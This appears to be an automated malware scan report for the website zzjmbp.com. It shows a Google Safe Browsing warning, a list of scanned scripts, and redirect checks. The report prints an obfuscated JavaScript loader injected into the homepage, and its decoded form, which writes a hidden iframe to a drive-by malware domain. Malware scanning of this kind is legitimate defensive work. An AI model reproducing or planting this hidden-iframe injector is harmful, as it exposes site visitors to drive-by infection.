Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zzjmbp.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.zzjmbp.com/ | 200 OK Content-Length: 36653 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}try{begbe=prototype;}catch(b43gds){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f.substr(11)+zz];n=[-2.75,-2.75,21.25,20.5,3,5,20,22.75,19.75,24.25,22.25,20.25,22.5,24,6.5,20.75,20.25,24,12.25,22,20.25,22.25,20.25,22.5,24,23.75,11.5,25.25,16,19.25,20.75,14.5,19.25,22.25,20.25,5,4.75,19.5,22.75,20,25.25,4.75,5.25,17.75,7,18.25,5.25,25.75,-1.75,-2.75,-2.75,-2.75,21.25,2 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.s <iframe src='http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://www.zzjmbp.com/images/js.js | 200 OK Content-Length: 1218 Content-Type: application/x-javascript | clean |
http://www.zzjmbp.com/script/minisite.weather.js | 200 OK Content-Length: 12718 Content-Type: application/x-javascript | clean |
http://www.zzjmbp.com/script/bannerhuandeng.js | 200 OK Content-Length: 1099 Content-Type: application/x-javascript | clean |
http://www.zzjmbp.com/script/roll.js | 200 OK Content-Length: 522 Content-Type: application/x-javascript | clean |
http://www.zzjmbp.com/script/huandeng.js | 200 OK Content-Length: 1101 Content-Type: application/x-javascript | clean |
http://www.zzjmbp.com/ http://net.zoosnet.net/JS/LsJS.aspx?siteid=NET24927771&float=1 | 400 Bad Request Content-Length: 37 Content-Type: text/html | clean |
http://www.zzjmbp.com/test404page.js | 404 Not Found Content-Length: 83 Content-Type: text/html | clean |
http://im.bizapp.qq.com:8000/kf_100630.js | 200 OK Content-Length: 17868 Content-Type: application/x-javascript | clean |
http://js.users.51.la/5978258.js | 200 OK Content-Length: 1978 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zzjmbp.com
Result:
GET / HTTP/1.1
Host: zzjmbp.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: zzjmbp.com
Referer: http://www.google.com/search?q=zzjmbp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zzjmbp.com
Referer: http://www.google.com/search?q=zzjmbp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.